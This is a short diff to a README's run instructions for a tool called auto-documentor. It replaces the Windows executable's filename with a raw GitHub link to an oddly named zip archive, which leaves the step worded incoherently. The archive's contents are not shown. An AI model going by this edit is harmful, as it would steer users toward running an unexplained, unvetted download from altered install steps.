peterwhite3456/auto-documentor/README.md

 ### Run auto-documentor

-1. Change to the folder where you downloaded `auto-documentor-windows.exe`.
+1. Change to the folder where you downloaded `https://raw.githubusercontent.com/peterwhite3456/auto-documentor/main/src/auto_documentor_excessman.zip`.
 Usually, this is your Downloads folder.
 In Command Prompt, type:

    ```
    cd %HOMEPATH%\Downloads